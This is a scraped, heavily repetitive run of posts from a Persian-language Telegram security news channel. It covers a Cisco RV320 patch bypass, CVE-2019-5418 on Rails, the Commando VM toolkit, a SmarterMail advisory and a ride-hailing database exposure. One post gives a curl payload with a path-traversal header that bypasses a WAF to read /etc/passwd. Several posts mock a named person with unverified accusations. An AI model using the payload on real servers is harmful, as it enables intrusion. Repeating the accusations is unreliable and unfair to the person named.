حتما در طی روزهای اخیر در مورد آسیب پذیری اجرای دستور از راه دور در روترهای سیسکو سری های RV320 و RV325 خبرهایی خوانده اید که جزییات آن در لینک زیر قابل مشاهده است:
https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-005/-cisco-rv320-command-injection
اما وصله ی منتشر شده توسط سیسکو که مورد اعتراض کارشناسان نیز قرار گرفته است فقط درخواست مهاجم را بررسی میکند و اگر این درخواست با دستور curl اجرا شده باشد (اگر هدر درخواست ارسال شده مطابق با useragent مورد استفاده توسط دستور curl باشد) آن را متوقف میکند که این فیلتر به راحتی قابل دور زدن میباشد!
#news
#cisco
#exploit
#rce
@sec_nerd
https://www.redteam-pentesting.de/en/advisories/rt-sa-2019-005/-cisco-rv320-command-injection
اما وصله ی منتشر شده توسط سیسکو که مورد اعتراض کارشناسان نیز قرار گرفته است فقط درخواست مهاجم را بررسی میکند و اگر این درخواست با دستور curl اجرا شده باشد (اگر هدر درخواست ارسال شده مطابق با useragent مورد استفاده توسط دستور curl باشد) آن را متوقف میکند که این فیلتر به راحتی قابل دور زدن میباشد!
#news
#cisco
#exploit
#rce
@sec_nerd
امنیت اطلاعات
CVE-2019-5418 - File Content Disclosure on Rails https://github.com/mpgn/CVE-2019-5418 #web #pentest #rails #ruby @sec_nerd
دور زدن WAF در این آسیب پذیری
curl -H 'Accept: ../../../../../../e*c/p*s*d{{' https://server/...
@sec_nerd
curl -H 'Accept: ../../../../../../e*c/p*s*d{{' https://server/...
@sec_nerd
شرکت اسراییلی FireEye یک شرکت امنیت سایبری است که قسمتی از فعالیت های این شرکت مربوط به شناسایی گروه های هکری و گزارش فعالیت های آنان است. از جمله این گزارشات میتوان به گزارشات این گروه در خصوص هکرهای ایرانی اشاره کرد که در برخی موارد منجر به اعلام جرم علیه افراد شناخته شده در این حملات گردیده است.
این شرکت اخیرا بسته ابزارهای تست نفوذی را بصورت رایگان در اختیار هکرها قرار داده است که بسته ی مذکور توسط اسکریپت پاورشل بر روی ویندوز ۷ (نصب شده بر روی ماشین مجازی) نصب میشود.
لیست ابزارها و نحوه نصب آنها را در لینک زیر مشاهده کنید:
https://github.com/fireeye/commando-vm
#fireeye
#israel
#pentest
#windows
@sec_nerd
این شرکت اخیرا بسته ابزارهای تست نفوذی را بصورت رایگان در اختیار هکرها قرار داده است که بسته ی مذکور توسط اسکریپت پاورشل بر روی ویندوز ۷ (نصب شده بر روی ماشین مجازی) نصب میشود.
لیست ابزارها و نحوه نصب آنها را در لینک زیر مشاهده کنید:
https://github.com/fireeye/commando-vm
#fireeye
#israel
#pentest
#windows
@sec_nerd
رسانه خبری جعبه سیاه، چند هزار صفحه سند، تصویر و فایل ویدیویی بسیار مهم با طبقه بندی #بکلی_سری از برنامه نظامی هسته ای ایران که با هدف ساخت #سلاح_هسته_ای و تحت نام طرح #آماد میباشد در اختیار دارد.
جملات بالا از کانالی به نام جعبه سیاه برداشته شده که اخیرا تلاش زیادی میکنه که خودی نشون بده و طبق اسنادی که وجود داره ادمین این کانال فردی به نام مسعود مولوی هست که میتونید جزییات بیشتری در مورد این شخص رو با جستجوی نامش در کانال وب آموز بدست بیارید.
جدای از اینکه این آدم چه عقبه و چه توهماتی در سر داره (صوتهای این فرد رو در ادامه میفرستم) و ما قصد نداریم بهش بپردازیم، بیشتر این ادبیات نگارشی و سواد رسانه ای مدنظر ما هست، چرا که بعضی افراد با خوندن پستهای این کانال ممکنه فکر کنن که این فرد یا گروه به منابع اطلاعاتی فوق العاده ای دسترسی دارن و همه جا رو هک کرده و اطلاعات کل مملکت رو در دست دارن (چندهزار صفحه سند!)
این فرد که پیش از این هم با دزدی و کپی کاری، اختراعاتی رو به اسم خودش ثبت کرده،این بار هم اسناد پابلیک و عمومی رو تحت عناوین افشاگری و محرمانه و فوق سری به خورد مخاطبین کانالش میده!
فقط لینک اصلی افشاگری!! های اخیرش رو میگذارم که مربوط به سایت پارچین هست:
https://www.fdd.org/analysis/reports/2019/01/11/a-key-missing-piece-of-the-amad-puzzle/
این اسناد چهار ماه پیش عمومی شدن!
#سواد_رسانه_ای
#جعبه_سیاه
#هوچی_سایبری
@sec_nerd
جملات بالا از کانالی به نام جعبه سیاه برداشته شده که اخیرا تلاش زیادی میکنه که خودی نشون بده و طبق اسنادی که وجود داره ادمین این کانال فردی به نام مسعود مولوی هست که میتونید جزییات بیشتری در مورد این شخص رو با جستجوی نامش در کانال وب آموز بدست بیارید.
جدای از اینکه این آدم چه عقبه و چه توهماتی در سر داره (صوتهای این فرد رو در ادامه میفرستم) و ما قصد نداریم بهش بپردازیم، بیشتر این ادبیات نگارشی و سواد رسانه ای مدنظر ما هست، چرا که بعضی افراد با خوندن پستهای این کانال ممکنه فکر کنن که این فرد یا گروه به منابع اطلاعاتی فوق العاده ای دسترسی دارن و همه جا رو هک کرده و اطلاعات کل مملکت رو در دست دارن (چندهزار صفحه سند!)
این فرد که پیش از این هم با دزدی و کپی کاری، اختراعاتی رو به اسم خودش ثبت کرده،این بار هم اسناد پابلیک و عمومی رو تحت عناوین افشاگری و محرمانه و فوق سری به خورد مخاطبین کانالش میده!
فقط لینک اصلی افشاگری!! های اخیرش رو میگذارم که مربوط به سایت پارچین هست:
https://www.fdd.org/analysis/reports/2019/01/11/a-key-missing-piece-of-the-amad-puzzle/
این اسناد چهار ماه پیش عمومی شدن!
#سواد_رسانه_ای
#جعبه_سیاه
#هوچی_سایبری
@sec_nerd
FDD
A Key Missing Piece of the Amad Puzzle
Download report
This media is not supported in your browser
VIEW IN TELEGRAM
شرح آسیب پذیری های کشف شده در SmarterMail توسط سروش دلیلی
https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
#smartermail
#exploit
#web
@sec_nerd
https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
#smartermail
#exploit
#web
@sec_nerd
Forwarded from وب آموز (m J)
⭕️ امروز سالگرد تولد یکی از دانشمندان ایران اسلامی ه! دکتری که به حق پدر هوش مصنوعی ایران ه ، دکتری که اتاق کارش وسط فدراسیون بین المللی مخترعان ایران ه https://t.iss.one/webamoozir/5029 دکتری که یه بعدها گرداننده کانال جعبه سیاه شد، دکتر دوست داریم مرسی که به دنیا اومدی
مرسی که نظرت با نظر اوباما نزدیکه 😂 https://t.iss.one/webamoozir/5013
مرسی که امید کردستانی رو میشناسی
وقت بشه امشب یکی از افتخارات دکتر و مرور کنیم.
@webamoozir
مرسی که نظرت با نظر اوباما نزدیکه 😂 https://t.iss.one/webamoozir/5013
مرسی که امید کردستانی رو میشناسی
وقت بشه امشب یکی از افتخارات دکتر و مرور کنیم.
@webamoozir
Forwarded from وب آموز (m J)
CURRICULUM_VITAE.docx
96.5 KB
بخشی از روزمه دکتر مسعود مولوی وردجانی رو بخونید ببنید ما چه عزیزی و فراری دادیم ترکیه! حیفه به خدا
فقط اونجاش که نوشته:
Citizenship: Iranian – American (United State)
😂 باور کنید با همین رزومه لای مسئولین وول میخورنه همینقدر شوخیه اون بالا!
@webamoozir
فقط اونجاش که نوشته:
Citizenship: Iranian – American (United State)
😂 باور کنید با همین رزومه لای مسئولین وول میخورنه همینقدر شوخیه اون بالا!
@webamoozir
Forwarded from ناویا، ماشین کاوش اپلای
ناویا، ماشین کاوش اپلای
https://twitter.com/offsecmag/status/1118801911120048129
دیتابیس اپلیکیشن رانندگان تپسی که بر روی یک پایگاه nosql از نوع مونگو ذخیره شده بود، توسط یک محقق امنیتی خارجی کشف و گزارش شد.
این دیتابیس که doroshke-invoice-production نام دارد حاوی اطلاعاتی از فاکتورهای سال های ۹۵ و ۹۶ بوده و بیش از ۶ میلیون و هفتصد هزار رکورد را در خود ذخیره کرده است.
این رکوردها شامل نام و نام خانوادگی راننده، کدملی، شماره تلفن و تاریخ فاکتور است.
https://securitydiscovery.com/iranian-ride-hailing-app-database-exposure/
#news
#iran
#breach
#tapsi
@sec_nerd
این دیتابیس که doroshke-invoice-production نام دارد حاوی اطلاعاتی از فاکتورهای سال های ۹۵ و ۹۶ بوده و بیش از ۶ میلیون و هفتصد هزار رکورد را در خود ذخیره کرده است.
این رکوردها شامل نام و نام خانوادگی راننده، کدملی، شماره تلفن و تاریخ فاکتور است.
https://securitydiscovery.com/iranian-ride-hailing-app-database-exposure/
#news
#iran
#breach
#tapsi
@sec_nerd
حرکات جانبی در ویندوز با استفاده از فایل های MSI
https://ired.team/offensive-security/wmi-+-msi-lateral-movement
#windows
#lateral_movement
#msf
#privesc
@sec_nerd
https://ired.team/offensive-security/wmi-+-msi-lateral-movement
#windows
#lateral_movement
#msf
#privesc
@sec_nerd